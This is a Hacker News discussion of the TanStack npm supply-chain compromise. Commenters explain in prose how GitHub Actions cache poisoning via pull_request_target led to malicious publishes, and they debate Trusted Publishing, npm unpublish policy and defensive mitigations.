5/12/2026 at 4:15:27 PM

That is not done because then it would be slow.

I don’t think that’s a very strong argument, but that’s the rationale for not having simpler, no-state-shared-between-runs pipelines everywhere I have worked.

by zbentley

5/11/2026 at 10:06:59 PM

It is unfortunate, but this is evidence (IMO) that Trusted Publishing is still ~~not secure~~ not enough by itself to securely publish from CI, as an attacker inside your CI pipeline or with stolen repo admin creds can easily publish. This isnt new information, TP is not meant to guarantee against this, but migrating to TP away from local publish w/ 2fa introduces this class of attack via compomise of CI. (edit: changed "still not secure" to "still not enough by itself" bc that is the point I want to make)

Going to Trusted Publishing / pipeline publishing removes the second factor that typically gates npm publish when working locally.

The story here, while it is evolving, seems to be that the attacker compromised the CI/CD pipeline, and because there is no second factor on the npm publish, they were able to steal the OIDC token and complete a publish.

Interesting, but unrelated I suppose, is that the publish job failed. So the payload that was in the malicious commit must have had a script that was able to publish itself w/ the OIDC token from the workflow.

What I want is CI publishing to still have a second factor outside of Github, while still relying on the long lived token-less Trusted Publisher model. AKA, what I want is staged publishing, so someone must go and use 2fa to promote an artifact to published on the npm side.

Otherwise, if a publish can happen only within the Github trust model, anyone who pwns either a repo admin token or gets malicious code into your pipeline can trivially complete a publish. With a true second factor outside the Github context, they can still do a lot of damage to your repo or plant malicious code, but at least they would not be able to publish without getting your second factor for the registry.

by jonchurch_

5/11/2026 at 10:08:57 PM

The astral blog recently pointed out how they do release gates (manual approvals on release workflows) even with trusted publishing. And sadly, all of the documentation for trusted publishing (NPM/PyPi/Rubygems) doesn't even mention this possibility, let alone defaulting to it.

by captn3m0

5/11/2026 at 10:15:14 PM

I have not read that blog post. But unfortunately (and I'd love to be wrong!) it doesn't matter for if a repo admin's token gets exfiled, because if you put your gates within Github, an admin repo token is sufficient to defang all of them from the API without 2fa challenge.

That is why I want 2fa before publish at the registry, because with my gh cli token as a repo admin, an attacker can disable all the Github branch protection, rewrite my workflows, disable the required reviewers on environments (which is one method people use for 2fa for releases, have workflows run in a GH environment whcih requires approval and prevents self review), enable self review, etc etc.

Its what I call a "fox in the hen house" problem, where you have your security gates within the same trust model as you expect to get stolen (in this case, having repo admin token exfiled from my local machine)

by jonchurch_

5/11/2026 at 10:19:31 PM

https://docs.github.com/en/actions/how-tos/deploy/configure-... is the feature they use.

> We impose tag protection rules that prevent release tags from being created until a release deployment succeeds, with the release deployment itself being gated on a manual approval by at least one other team member. We also prevent the updating or deletion of tags, making them effectively immutable once created. On top of that we layer a branch restriction: release deployments may only be created against main, preventing an attacker from using an unrelated first-party branch to attempt to bypass our controls.

> https://astral.sh/blog/open-source-security-at-astral

From what I understand, you need a website login, and not a stolen API token to approve a deployment.

But I agree in principle - The registry should be able to enforce web-2fa. But the defaults can be safer as well.

by captn3m0

5/11/2026 at 10:24:01 PM

I tested approving a deployment via API last week w/ my gh cli token (well, had claude do it while I watched). Again, I really want to be wrong about this, but my testing showed that it is indeed trivial to use the default token from my gh cli to approve via API. (repo admin scope, which I have bc I am admin on said repo)

Nothing in this link [1] proves what I said, but it is the test repo I was just conducting this on, and it was an approval gated GHA job that I had claude approve using my GH cli token

I also had claude use the same token to first reconfigure the enviornment to enable self-approves (I had configured it off manually before testing). It also put it back to self approve disabled when it was done hehe

[1] https://github.com/jonchurch/deploy-env-test/actions/runs/25...

by jonchurch_

5/11/2026 at 10:39:11 PM

You're right. Found the relevant docs+API calls:

https://docs.github.com/en/rest/actions/workflow-runs?apiVer...

Also for a Pending Deployment: https://docs.github.com/en/rest/actions/workflow-runs#review...

Both of these need `repo` scope, which you can avoid giving on org-level repos. For fine-grained tokens: "Deployments" repository permissions (write) is needed, which I wouldn't usually give to a token.

by captn3m0

5/12/2026 at 5:01:29 AM

sigh Github's idiotic fractal of authentication types.

What upthread is talking about is the Github CLI app, `gh`; it doesn't use a fine-grained tokens, it uses OAuth app tokens. I.e., if you look at fine grain tokens (Setting → Developer settings → Personal access tokens → Fine-grained token), you will not see anything corresponding to `gh` there, as it does not use that form of authentication. It is under Settings → Applications → Authorized OAuth Apps as "Github CLI".

I just ran through the login sequence to double-check, but the permissions you grant it are not configurable during the login sequence, and it requests an all-encompassing token, as the upthread suggests.

Another way to come at this is to look at the token itself: gh's token is prefixed with `gho_` (the prefix for such OAuth apps), and fine-grained tokens are prefixed with `github_pat_` (sic)¹

¹(PATs are prefixed with `ghp_`, though I guess fine-grained tokens are also sometimes called fine-grain PATs… so, maybe the prefix is sensible.)

by deathanatos

5/12/2026 at 6:18:49 AM

I’m paranoid but I never authenticate the GitHub CLI - there should be no tokens lying around on my system. If needed, I have some scoped PATs in pass, which I can source as env variables. Git Pushes happen over SSH with Yubikey.

by captn3m0

5/12/2026 at 12:51:00 PM

Exfiltrating an admin token is a big "if"; you shouldn't issue admin tokens at all, and GitHub does (at least for me) pop a proper MFA challenge when attempting to issue one.

(I wrote that Astral post.)

Edit: separately, I'll note that the risk of long-lived, highly privileged credentials is the primary motivating reason for Trusted Publishing: a developer's machine has (by necessity) a much higher degree of access than an ephemeral runner does, making it a much juicier target for an attacker. It also runs all kinds of stuff in a mostly unsandboxed manner, making it easier (in principle) to exploit. That's not to say there shouldn't be additional guards on publishing, but that I'm not remotely convinced that local publishing is any better by default.

by woodruffw

5/12/2026 at 2:04:50 PM

It seems the feature is only available for enterprise users if you want it in a private repo.

by skinfaxi

5/11/2026 at 10:20:35 PM

I'd like to have touch to sign from a YubiKey or similar. The whole idea of trusting the cloud to manage credentials on your behalf seems like a mistake.

by donmcronald

5/12/2026 at 12:44:00 PM

> The whole idea of trusting the cloud to manage credentials on your behalf seems like a mistake.

Isn't this what the "trusted" in "trusted publishing" implies? Maybe you're saying that trusted publishing itself seems like a mistake, but if so you don't need to use it: you can publish your packages the old-fashioned way and npm will make you go through the 2fa flow.

by matt_kantor

5/11/2026 at 11:17:48 PM

”TanStack maintainer Tanner Linsley said the attacker used an orphaned commit to gain access to the workflow run that stores the OIDC token, effectively bypassing the project’s existing publishing protections. He noted that two-factor authentication is enabled for everyone on the team”

by cluckindan

5/12/2026 at 12:45:59 AM

2fa being enabled for people on the team is different from 2fa being required for publishing. It is not current possible to enforce (or use) 2fa for publishing with trusted publishing.

by bakkoting

5/12/2026 at 12:31:08 AM

Apologies if this is a dumb question but how does this attack work? (I know what an orphaned commit is but not how you use one to bypass project access control).

by dboreham

5/12/2026 at 6:45:19 AM

TLDR is that the attacker leveraged actions/cache to cache a poisoned pnpm store which contains something that will be triggered during the package.json lifecycle. All it required was for someone to merge any PR to run whats in the cache trigger the second stage of the exploit: mint an OIDC token, build evil tarballs, and publish.

by fny

5/12/2026 at 2:40:26 AM

github holding on to orphaned commits has been a noted issue for a while now

by duskdozer

5/12/2026 at 3:22:39 AM

It’s a wonderful feature when you accidentally nuke your one and only local copy.

by koolba

5/12/2026 at 8:21:59 AM

Depending on how badly you nuked it, it's probably still in your `git reflog` locally. Normal git hangs on to orphaned commits too. (Until `git gc` runs)

by lexicality

5/11/2026 at 11:02:25 PM

I'm looking forward to the analysis how the attacker managed to compromise CI. I was reading through the workflow and what immediately jumped out was a cache poisoning attack. Seems plausible, given https://github.com/TanStack/config/pull/381

edit: two hard things in computer science: naming things, cache invalidation, off-by-one errors, security. something something

by wereHamster

5/12/2026 at 12:45:36 AM

Yes it is a GitHub actions cache poisoning attack

by dgellow

5/11/2026 at 11:27:08 PM

Almost all these recent compromises seem to involve either cache poisoning or prompt injection via untrusted variables.

by silverwind

5/11/2026 at 11:44:59 PM

I still think that Trusted Publishing is a significant win but I do like the idea of requiring a second factor to mark a release as truly published. It would make these CI worms very hard to pull off.

by staticassertion

5/12/2026 at 12:12:34 AM

The way I see it - if you're pushing a change to an NPM package with more than [N] daily downloads/downstream packages, and you don't have a human online who's able to approve a two-factor for the release on their phone... then you also don't have a human online who's able to hotfix or rollback in case of a breaking bug, much less a compromise. Even setting security aside - that's in service of a stable ecosystem.

And the two-factor approver should see a human-written changelog message alongside an AI summary of what was changed, that goes deeply into any updated dependencies. No sneaking through with "emergency bugfix" that also bumps a dependency that was itself social-engineered. Stop the splash radius, and disincentivize all these attacks.

Edit: to the MSFT folks who think of the stock ticker name first and foremost - you'd be able to say that your AI migration tools emit "package suggestions that embed enterprise-grade ecosystem security" when they suggest NPM packages. You've got customers out there who still have security concerns in moving away from their ancient Java codebases. Give them a reason to trust your ecosystem, or they'll see news articles like this one and have the opposite conclusion.

by btown

5/12/2026 at 12:33:45 AM

Yeah I have one semi-popular package and I am still doing local publish with 2fa because all this "trusted publishing" stuff seems really complicated and also seems to get hacked constantly. Maybe it's just too complicated for us to do securely and we should go back to the drawing board.

by streptomycin

5/11/2026 at 10:20:21 PM

I was always confused at why people claimed trusted publishing would make any difference to this kind of supply chain attack.

by herpdyderp

5/11/2026 at 11:46:59 PM

Because it does. The attack has to involve the CI pipeline rather than the dev environment, there's no token to revoke after (if you evict the attacker you're done, the OIDC credentials expire), it's easier to monitor for externally, you can build things like branch protections in and isolate things like "run tests" from "publish", etc. Trusted Publishing is not itself a solution to all supply chain issues but it is a massive improvement.

by staticassertion

5/12/2026 at 12:02:26 AM

I agree with you that TP is an improvement over long lived npm tokens in CI.

However, the threat Im most afraid of still does involve dev environment compromise. Because if your repo admin gets their token stolen from their gh cli, they can trivially undo via API (without a 2fa gate!) any github level gate you have put in place to make TP safe. I want so badly to be wrong about that, we have been evaluating TP in my projects and I want to use it. But without a second factor to promote a release, at the end of the day if you have TP configured and your repo admin gets pwned, you cannot stop a TP release unless you race their publish and disable TP at npm.

TP is amazing at removing long lived npm tokens from CI, but the class of compromise that historically has plagued the ecosystem does not at all depend on the token being long lived, it depends on an attacker getting a token which doesnt require 2fa.

I am begging for someone to prove me wrong about this, not to be a shit, but because I really want to find a secure way to use TP in lodash, express, body-parser, cors, etc

by jonchurch_

5/12/2026 at 12:13:25 AM

Yes, that is the threat I'm most worried about as well. But look at your description of it - a repo admin has to be compromised. Not just "random engineer". Although, in this case, the attacker leveraged a cache poisoning attack to move into the privileged workflow and I suspect this sort of thing will be commonplace.

I'm in agreement that a second factor would be ideal, to be clear. I think it's a good idea, something like "package is released with Trusted Publishing, then 'marked' via a 2FA attestation". But in theory that 2FA is supposed to be necessary anyways since you can require a 2FA on Github and then require approvals on PRs - hence the cache poisoning being required.

by staticassertion

5/12/2026 at 12:36:20 AM

Not to beat the dead horse, but ths floored me when I realized it so I keep trying to shout it at the top of my lungs.

There is no gate you can put on a Trusted Publisher setup in github which requires 2fa to remove. Full stop. 2fa on github gates some actions, but with a token with the right scope you can just disable the gating of workflow-runs-on-approve, branch protection, anything besides I think repo deletion and renaming.

And in my experience most maintainers will have repo admin perms by nature of the maintainer team being small and high trust. Your point is well taken, however, that said stolen token does need to have high enough privileges. But if you are the lead maintainer of your project, your gh token just comes with admin on your repo scope.

by jonchurch_

5/12/2026 at 7:17:37 AM

I use GitHub environments to require a manual approval (which includes MFA) in GitHub, prior to a pipeline running with a oidc token capable of publishing.

Would this have caught the cache poisoning? Unsure, though it at least means I'm intentionally authorising and monitoring each publish for anything unexpected.

https://docs.github.com/en/actions/deployment/targeting-diff...

by mnahkies

5/12/2026 at 9:42:43 AM

Yeah, it's kinda weird - it's not like GitHub uses a particular secure stack, formal verification or anything. It's just a regular build server with a power to compromise millions of software packages.

Bitcoin people solved problem a decade ago with deterministic build: Bitcoin core is considered publisher when 5+ devs get bit-exact build artifact, each individually signing a hash. Replicating that model isn't hard, it's just that nobody cares. People just want to trust the cloud because it's big

by killerstorm

5/12/2026 at 2:16:44 PM

"Works on my machine" - a colleague's mug from back in the day. He was just being funny, but there's a bit of truth in every joke. Reproducibility was only occasionally a top concern for developers, and then github and other CI tools came along to offload that concern all together. Perhaps with the growing threat maintainers will start to care again. Github should just turn off publishing capabilities and force them to care.

by webXL

5/12/2026 at 4:12:29 AM

[dead]

by decodebytes

5/11/2026 at 10:18:41 PM

Postinstall scripts are deadly. Everyone should be using pnpm.

Crazy that an "orphan" commit pushed to a FORK(!) could trigger this (in npm clients). IMO GitHub deserves much of the blame here. A malicious fork's commits are reachable via GitHub's shared object storage at a URI indistinguishable from the legit repo. That is absolutely bonkers.

by chrisweekly

5/12/2026 at 1:00:06 AM

The compromised action here was using pnpm.

They poisoned the github action cache, which was caching the pnpm store. The chain required pull_request_target on the job to check bundle size, which had cache access and poisoned the main repo’s cache

The malicious package that was publisjed will compromise local machines its installed in via the prepare script, though.

by jonchurch_

5/12/2026 at 8:27:28 AM

Those are two different attack vectors. The exploit they used on Github Actions would work for either npm or pnpm. But the replication part using postinstall scripts, once it is installed on another machine, would be stopped by pnpm.

What I'm curious about is: how can you poison the cache in CI, if the lockfile has an integrity hash for each package?

Did the incoming PR modify pnpm-lock.yaml? If so, that would an obvious thing to disallow in any open-source project and require maintainer oversight.

by ricardobeat

5/15/2026 at 8:36:48 AM

Perhaps pnpm trusts the local store?

by pas

5/12/2026 at 12:21:43 PM

From what I understand they've wrote the poisoned payload directly to the file system where they've expected another package exists. You only need to know what hash is going to be created.

by Yokohiii

5/13/2026 at 1:51:07 AM

How do you know the hash in advance?

by KajMagnus

5/12/2026 at 6:23:17 AM

I think it was an afterthought in the design. CI cache should be scoped per-user, or at least per-group.

If a workflow run by a maintainer (with access to secrets) can pull a cache tarball uploaded by a random user on GitHub, then it’s a security black hole. More incidents like this are inevitable.

by maxloh

5/12/2026 at 3:46:20 AM

Yes, but the exploit was with Github Actions not something that pnpm really prevented.

by corvad

5/11/2026 at 10:21:14 PM

Once you run your app with the updated dependencies, that code is executed anyway. And root or non-root doesn't matter, the important stuff is available as the user running the application anyway.

by fabian2k

5/12/2026 at 12:32:05 PM

It's extremely rare that I install a dependency without executing code from it shortly after. I think postinstall scripts are unfortunate and an anti-pattern, but I don't realistically think that their removal would do very much to avoid these kinds of attacks.

by mort96

5/12/2026 at 5:22:15 PM

You should sandbox where you run the code. The thing is, it's very hard for me to know how to sandbox an install script, but it's actually quite easy (and my responsibility as the app dev) to know how to sandbox my tests/ application.

by staticassertion

5/11/2026 at 11:33:50 PM

How is this not a Github P0? Can anyone explain?

When I read that, I thought they must be using 'fork' wrong, and actually mean branch on the official repo, as that can't be right!?" Good lord.

by yetanotherjosh

5/12/2026 at 5:36:17 AM

In some cases, you can also use forks to read commits from private forks[0], but GitHub considers these linked commit networks working as intended.

[0]: https://trufflesecurity.com/blog/anyone-can-access-deleted-a...

by sheept

5/12/2026 at 7:23:46 AM

This is a very worthy article. I have an impression that I've read it before 2024, but maybe that was a different article describing the same mess with how github exposes private repos.

by sozforex

5/12/2026 at 4:13:40 AM

If git in general would enforce pretending to not know about orphans, it would always need to know what you were meaning to consider the boundary, and/or you would end up waiting for useless duplicate network traffic. The fact that on GitHub, such references are visible irrespective of specified repo is not a bug, its a feature. Its the tools (including but not limited to: GitHub Actions) that cause dangerous misunderstanding in appearing to let you specify something they then never actually enforce.

specified: repo location, slightly-difficult-to-preimage hash

intended meaning: use this hash if and only if it is accessible from the default branch of that repo

actual meaning: use this hash. start looking at this location. I do not care whether it is accessible through that location by accident, by intent of merely its uploader, or by explicit and persisting intent of someone with write access to the location.

by edelbitter

5/11/2026 at 11:41:44 PM

they probably used the publish token in a pull-request-target workflow or something?

by ZeWaka

5/12/2026 at 12:05:55 AM

yes, they used pull_request_target for a benchmarking suite. github has a huge warning saying to never use pull_request_target to run user code, but this is just going to keep happening

by ghost_pepper

5/12/2026 at 1:07:21 AM

> github has a huge warning saying to never use pull_request_target to run user code

This is an area where documentation is necessary but not sufficient. Github needs to add some form of automated screening mechanism to either prevent this usage, or at the very least quickly flag usages that might be dangerous.

by riknos314

5/12/2026 at 11:42:34 AM

"pull_request_target" vs "pull_request" is also bad naming. At least give it a dangerous name so people know there's a dangerous quirk to it when reading their config.

by hombre_fatal

5/12/2026 at 3:10:08 AM

And a labeling action which requires `pull_request_target`: https://github.com/actions/labeler#create-workflow

These types of features are not worth it and need to be removed from the marketplace.

by qudat

5/12/2026 at 7:42:03 AM

Because GitHub only cares about AI.

by cedws

5/12/2026 at 7:57:08 AM

And maintaining high level of service availability!

by eviks

5/12/2026 at 10:02:20 AM

With zero down time!

by rvz

5/11/2026 at 11:11:17 PM

@mistralai/mistralai npm package was also compromised as part of this worm https://github.com/mistralai/client-ts/issues/217

It has been pulled from the npm registry now.

by varunsharma07

5/11/2026 at 11:34:49 PM

https://tanstack.com/blog/npm-supply-chain-compromise-postmo...

We (TanStack) just released our postmortem about this.

by crutchcorn

5/12/2026 at 6:53:59 AM

I didn't see a key section of a COE: "What are we doing to make sure this can't happen again?"

Apologies if I missed it. There's some discussion of things under what could have gone better, but prevention is key, and the reports not done without it.

by ____tom____

5/12/2026 at 1:25:46 PM

We had a few revisions of the postmortem with this included, but ultimately felt premature to include given how quickly we released this notice.

That's not to say that we're not working hard on preventative work, however. We:

- [x] Temporarily removed the cache from our PNPM setup

- [x] Removed all caches from GitHub Actions

- [x] Locked down all GitHub actions on the org to commit IDs instead of version numbers

- [x] Enforced non-SMS GitHub 2FA (NPM & GitHub 2FA was already enforced, but SMS was previously allowed)

- [x] Removed all usage of `pull_request_target` from our CI pipeline (already wasn't in our CD)

- [ ] Are introducing `zizmor` as action linting to every repo via a PR check

- [ ] Are likely introducing `CODEOWNERS` on `.github` folders to restrict merging to only the 7 core maintainers

- [ ] Will replace the PNPM setup cache with `actions/cache/restore`, which has more secure defaults

- [ ] Will replace the PNPM setup cache to be isolated between release and PR envs

- [ ] May close the ability to make a TanStack PR as an external contributor (But we're absolutely not going closed source)

We'll have a follow-up blog post that outlines all of this and how maintainers are able to secure themselves simiarly.

by crutchcorn

5/12/2026 at 6:02:33 AM

(We changed the URL from https://github.com/TanStack/router/issues/7383 to that above.)

by dang

5/12/2026 at 3:55:40 AM

thank you for maintaining this inspiring ecosystem.

by swyx

5/12/2026 at 12:47:38 AM

Am I understanding this attack vector correctly: Did tanstack have anything misconfigured on their github or make any mistakes that led to this happening? This is the second time, at least, the github actions cache has been seemingly detrimental to massive and widespread supply chain compromise; what is going on over there?

by 827a

5/12/2026 at 1:16:55 AM

The fundamental mistake here seems to have been not fully understanding the threat model of the pull_request_target action trigger.

pull_request_target jobs run in response to various events related to a pull request opened against your repo from a fork (e.g, someone opens a new PR or updates an existing one). Unlike pull_request jobs, which are read-only by default, pull_request_target jobs have read/write permissions.

The broader permissions of pull_request_target are supposed to be mitigated by the fact that pull_request_target jobs run in a checkout of your current default branch rather than on a checkout of the opened PR. For example, if someone opens a PR from some branch, pull_request_target runs on `main`, not on the new branch. The compromised action, however, checked out the source code of the PR to run a benchmark task, which resulted in running malicious attacker-controlled code in a context that had sensitive credentials.

The GHA docs warn about this risk specifically:

> Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.

They also further link to a post from 2021 about this specific problem: https://securitylab.github.com/resources/github-actions-prev.... That post opens with:

> TL;DR: Combining pull_request_target workflow trigger with an explicit checkout of an untrusted PR is a dangerous practice that may lead to repository compromise.

The workflow authors presumably thought this was safe because they had a block setting permissions.contents: read, but that block only affects the permissions for GITHUB_TOKEN, which is not the token used to interact with the cache. This seems like the biggest oversight in the existing GHA documentation/api (beyond the general unsafety of having pull_request_target at all). Someone could (and presumably did!) see that block and think "this job runs with read-only permissions", which wasn't actually true here.

by ssanderson11235

5/12/2026 at 7:59:26 AM

What I don't get is how the GitHub Action cache is shared between unprotected and protected refs. Is that really the case?

Why even have protected branch rules when anyone with write access to an unprotected branch can poison the Action cache and compromise the CI on the next protected branch run?

In GitLab CI caches are not shared between unprotected and protected runs.

by user34283

5/12/2026 at 1:00:08 PM

Static analyzers like https://github.com/zizmorcore/zizmor can help find such misconfiguration. It is however unfortunate, that such footguns aren't harder to fire.

by lknuth

5/12/2026 at 2:11:16 PM

Many thanks for sharing this. I wasn't aware it existed.

by jherdman

5/12/2026 at 2:19:30 AM

From a GitHub product owner POV, if the architecture is not to be changed, what is the solution?

A big ugly warning in the UI?

Or, push back on the architecture?

Or, is threatening a big ugly warning in the UI actually pushing back on the architecture?

by consumer451

5/12/2026 at 5:42:56 PM

> A big ugly warning in the UI?

There's already a warning in the docs. There's no UI to put the warning in that isn't going to be visible until it's too late. And even that warning isn't scary enough - this documentation is buried behind a "warning" in the docs and then two more links to get to the meat.

> Workflows triggered via pull_request_target have write permission to the target repository. They also have access to target repository secrets. The same is true for workflows triggered on pull_request from a branch in the same repository, but not from external forks. The reasoning behind the latter is that it is safe to share the repository secrets if the user creating the PR has write permission to the target repository already.

> pull_request_target runs in the context of the target repository of the PR, rather than in the merge commit. This means the standard checkout action uses the target repository to prevent accidental usage of the user supplied code.

So what this means is if you use `pull_request_target`, the jobs have read and write access to privileged data in the repo (including secrets) and the code the job runs is controlled by the target.

> Or, push back on the architecture?

Personally, I would advocate to remove this feature for public repositories. It has ~zero legitimate use cases. If it needs to come back, it should be an error to run jobs on this trigger if the user that initiated it doesn't have write permissions for the repo.

If this breaks CI pipelines that is a good thing. Those pipelines are just waiting to be pwned.

There's a PR open to mitigate this on actions/cache but I don't believe it's actually solving the root cause, which is in the design of actions itself.

by duped

5/12/2026 at 3:48:47 AM

Many projects kind of take a different approach where for pull requests CI is not run until approvals from maintainers are given even for very simple jobs to avoid untrusted code running in ci.

by corvad

5/12/2026 at 3:47:46 AM

At least my naive brain wonders if blocking force pushes to main would have stopped this as it is a setting in Github these days, unless I am misunderstanding the final attack vector since it seems it was force pushed.

by corvad

5/12/2026 at 12:12:40 PM

Noone force-pushed to main in the actual repo. The attacker force-pushed to main in their own fork, but the actual repo had a CI job configured that ran code from the fork in response to changes in that fork.

by ssanderson11235

5/12/2026 at 12:39:25 PM

Ah that makes more sense I was kind of confused by that.

by corvad

5/12/2026 at 1:53:32 AM

> Unpublish was unavailable for nearly all affected packages because of npm's "no unpublish if dependents exist" policy. We have to rely on npm security to pull tarballs server-side, which adds hours of delay during which malicious tarballs remain installable

Per https://docs.npmjs.com/policies/unpublish:

> If your package does not meet the unpublish policy criteria, we recommend deprecating the package. This allows the package to be downloaded but publishes a clear warning message (that you get to write) every time the package is downloaded, and on the package's npmjs.com page. Users will know that you do not recommend they use the package, but if they are depending on it their builds will not break. We consider this a good compromise between reliability and author control.

I don't even know what to say here, npm.

by ezekg

5/12/2026 at 1:59:09 AM

I do not envy the position the npm team are in. They removed the ability to unpublish packages as a response to the left-pad incident[1] because it wasn't desirable for individual developers to break downstream dependencies by pulling their package maliciously.

Of course the side effect is that now it's much harder to pull packages for legitimate reasons :/

[1] https://en.wikipedia.org/wiki/Npm_left-pad_incident

by sophiabits

5/12/2026 at 4:34:42 AM

Maybe give publishers a way to quarantine versions with a warning that stops the install, but allows users can override if they choose to is the next step?

Give a publisher a way to tag a version as malicious and then in those hours between the exploit being noticed and the package being removed anyone who tries to install gets a message about that version being quarantined and asking whether they want to proceed.

It's not a perfect solution, but I think it's better than just waiting for NPM to take action without opening the door up to another left pad situation.

by superfrank

5/12/2026 at 4:41:42 AM

I think cargo's yank is a good balance. It makes it difficult to pull the yanked version in as a dependency, but doesn't break existing usages, as long as the version is in the lockfile. And I think even then gives you a warning that you are using a yanked package.

by thayne

5/12/2026 at 3:00:01 AM

The obvious solution is that unpublish should be available within a time window after a new version is published and then unavailable after that.

by zarzavat

5/12/2026 at 3:07:00 AM

There is a time window - https://docs.npmjs.com/policies/unpublish

by beart

5/12/2026 at 3:15:44 AM

Yes but they didn't do it properly. They only allow unpublishing if there are no dependants, which means it can't be used to pull a package version for security reasons.

It should be that within the first X hours you can pull a version regardless of dependants, after that you should need approval.

by zarzavat

5/12/2026 at 12:15:12 PM

I would prefer my builds to break than the ecosystem to be compromised.

That said, once unpublished the version should be permanently unavailable to prevent publishing over known good versions.

by antihero

5/13/2026 at 4:47:09 AM

If a package developer maliciously breaks everyone's builds,

isn't that pretty great?

Because now you have learnt that you can't trust them

by KajMagnus

5/12/2026 at 2:34:43 AM

I mean they brought that incident on themselves...

by ummonk

5/12/2026 at 4:37:50 PM

Yeah, all left pad incident showed was that NPM cares more about their corporate users than open source developers.

by shimman

5/12/2026 at 2:06:25 AM

The baffling part is why it takes hours for the npm security team to unpublish packages that contain malware, as attested by multiple independent sources? That should be able to happen in minutes.

by igregoryca

5/12/2026 at 3:20:26 AM

It would take longer than minutes to validate the claims themselves.

by linkregister

5/12/2026 at 2:27:50 AM

Who vets the sources, and using what scheme?

by consumer451

5/12/2026 at 4:51:15 AM

If email matches owner of repo, pull now. If not verified, ban and restore later.

by tomjen3

5/12/2026 at 2:43:31 AM

Some sort of middle ground should have been found where the unpublished package is still accessible as an archive or something. I'd much rather get my package broken than get hacked

by nabogh

5/12/2026 at 12:24:21 PM

So in summary:

- a writable shared global cache is made available to PRs opened from forks by randomers.

- that cache is reused in the deploy pipeline

- deploys can be made with a single authentication factor, stored on the CI server

- the repository apparently does nothing to check for malicious deploys, delegating that to 3rd parties to do after the code is in the wild.

- by default the package manager runs random code when a package is updated

What a world we live in.

by padjo

5/12/2026 at 2:18:18 PM

And the gotcha has been known about since 2014:

> This is the class of attack documented by Adnan Khan in 2024. It's not a TanStack-specific bug; it's a known GitHub Actions design issue that requires conscious mitigation.

While it seems the maintainers kinda went-out-of-their way to enable this - GitHub could easily have at least turned of cache-sharing between fork jobs and the main jobs...

by olejorgenb

5/11/2026 at 10:39:43 PM

I think we are at the point where everyone really needs to run each project in its own vm.

Given the recent lpe vulns docker 100% won’t cut it.

And containers were never meant primarily as a security boundary anyways

by getcrunk

5/12/2026 at 12:08:52 AM

QubesOS had the right idea. You want layers and layers of security, with multiple VMs at the root.

by Gigachad

5/12/2026 at 10:03:47 AM

See also: https://genode.org/

Also, in addition to isolation and https://en.wikipedia.org/wiki/Capability-based_security between processes, capability security within processes, see languages like E (https://web.archive.org/web/20260506035108/https://erights.o...) or Monte (https://monte.readthedocs.io/en/latest/index.html)

by 7373737373

5/12/2026 at 12:18:00 AM

> had the right idea

Is it no longer the right idea?

by halfcat

5/12/2026 at 12:43:16 AM

I mean that in the sense that they had the idea way before the wave of rapid linux 0days and supply chain attacks were common. The design they picked has only become more relevant.

by Gigachad

5/11/2026 at 10:48:21 PM

Luckily, projects using more secure language ecosystems like C and C++ are spared this kind of problems :-)

by einpoklum

5/11/2026 at 11:11:08 PM

No, instead the code that isn't from a dependency is what will cause you to get pwned

by saghm

5/11/2026 at 11:25:16 PM

I think you missed the joke/sarcasm there.

by eqvinox

5/11/2026 at 11:37:27 PM

It's been less than a month since I responded to a comment on a different thread arguing basically the same thing about C/C++ in a serious way. I've long since lost the ability to distinguish.

by saghm

5/12/2026 at 12:31:56 AM

Fair, I'm in fact not 100% sure it's a joke. But there's a smiley, that's pushing me to 90%.

by eqvinox

5/12/2026 at 12:20:08 AM

The virus fest of the 90s would like a word with you and your C

by Havoc

5/12/2026 at 4:27:29 AM

you can't get infected through the package manager if your language doesn't have a package manager :) turns out C and C++ were playing 4D chess all along

by aiscoming

5/11/2026 at 10:54:37 PM

[dead]

by bpavuk

5/12/2026 at 12:17:21 AM

Devcontainers (I know it's not a full VM, but it's most prominent version of this "isolated development environment" concept) wouldn't fully protect you against this. Github credentials are automatically pulled into the container. If you are using other cloud services that need to be accessed within the container, this cred stealer will grab their creds too.

It would limit the blast radius, which at least is an improvement.

by omcnoe

5/12/2026 at 11:29:36 AM

This is one reason I have my own dev container script. And the container pulls nothing in except whatever I explicitly put in my .podman folder. It runs without any GitHub access at all. I do all of that from the host machine.

by christophilus

5/11/2026 at 10:55:19 PM

Or a vm per container, if you insist on containers. I've have a couple of relaxed weeks recently due to running everything on VMs rather than some random Kubernetes service.

by 9cb14c1ec0

5/12/2026 at 4:09:09 AM

it's not going to help if you share a cache across security boundaries. That is what happened here and seems to be driving a spate of github action related problems.

by zmmmmm

5/12/2026 at 7:40:20 AM

Why do we do all these efforts making our build systems hermetic and we end up just using a global mutable cache across branches where the caller picks the key? Failure of industry as a whole. Actually insane.

by arianvanp

5/12/2026 at 6:32:28 AM

What do folks here do to avoid having plaintext credentials on disk? I try to use 1Password's plugins where I can. I find the SSH key (and got signing) experience flawless, but the cli experience (eg aws cli) pretty clunky - they often break, and they don't even have a gcp plugin last I checked.

by timwis

5/12/2026 at 1:45:13 PM

I use `pass` on all my personal dev workstations and phone (because I happen to own YubiKeys/OpenPGP cards with my PGP key on them anyway; would probably use `age`/SOPS instead if I already hadn't committed to the PGP ecosystem).

If /usr/bin/bar wants a credential via a FOO_API_KEY environment variable, I create a /usr/local/bin/bar wrapper script like so:

    #!/bin/bash
    set -eu +x
    
    if [[ -z "${FOO_API_KEY:-}" ]]; then
      echo >&2 Decrypting FOO_API_KEY
      FOO_API_KEY="$(pass show bar/FOO_API_KEY)"
    fi

    export FOO_API_KEY
    exec /usr/bin/bar "$@"

by Hackbraten

5/12/2026 at 5:34:33 PM

Ooh, that's clever. Thanks for sharing.

by timwis

5/12/2026 at 7:18:57 AM

I'm not a huge fan of 1Password, there have been way too many issues in the past with it. If you're on a Mac, I can highly recommend you to check out Secretive https://github.com/maxgoedjen/secretive

by Myzel394

5/12/2026 at 7:38:26 AM

Love that feeling when you read through a repo and think, "Wow, this looks cool," and go to star it, and see that you already have, and clearly forgot about it

Anyway, thanks for sharing. It doesn't look like it handles cli auth though (aws, npm, etc. all leave tokens sitting in your home directory). What do you use for those?

by timwis

5/13/2026 at 5:05:33 AM

Or when you find some old source code at your workplace, and you're like: "this looks pretty nice, I wonder who wrote this?"

by KajMagnus

5/12/2026 at 9:05:23 AM

`sops` combined with `age` is great! Benefit is that it doesn't tie you into 1Password's ecosystem

by pprotas

5/12/2026 at 9:51:36 AM

That looks interesting, but unless I'm missing it, it still leaves you with things like ~/.aws/credentials in plaintext on disk, doesn't it?

